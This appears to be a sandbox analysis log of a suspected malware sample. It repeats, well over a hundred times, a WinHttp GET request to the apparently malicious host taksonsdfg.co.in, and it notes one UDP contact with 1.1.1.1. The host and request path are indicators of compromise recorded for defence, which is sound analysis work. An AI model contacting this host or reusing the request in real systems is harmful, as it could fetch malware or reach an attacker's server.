Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
Source: global traffic	HTTP traffic detected: GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: taksonsdfg.co.in
